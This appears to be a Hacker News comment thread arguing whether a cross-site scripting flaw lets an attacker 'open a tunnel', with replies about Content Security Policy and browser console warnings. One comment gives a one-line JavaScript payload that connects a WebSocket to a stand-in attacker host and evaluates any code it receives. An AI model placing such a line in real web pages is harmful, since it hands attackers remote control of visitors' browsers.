Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Show me where you can "open a tunnel" using the XSS in this post.

> Anything the user can do, you can do via an XSS attack.

I just explained why this isn't a reasonable assumption. You seem to have multiple fundamental misunderstandings about web application security so I don't think it's constructive for either of us to continue this conversation.



> Show me where you can "open a tunnel" using the XSS in this post.

   new WebSocket("ws://evil.com").addEventListener("message", e => eval(e.data))
> You seem to have multiple fundamental misunderstandings about web application security

Lol yeah sure buddy


Go to Discord and paste that into your console. None of us will hold it against you if you come back and delete these comments once you learn about Content Security Policy.


> Go to Discord and paste that into your console.

The same Discord that configures things so that any time you open the console it greets you with a giant message warning you not to paste anything into the console?


Maybe you should read up on what CSP can and can't do. Once an attacker can execute arbitrary code, they can do anything the client can.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: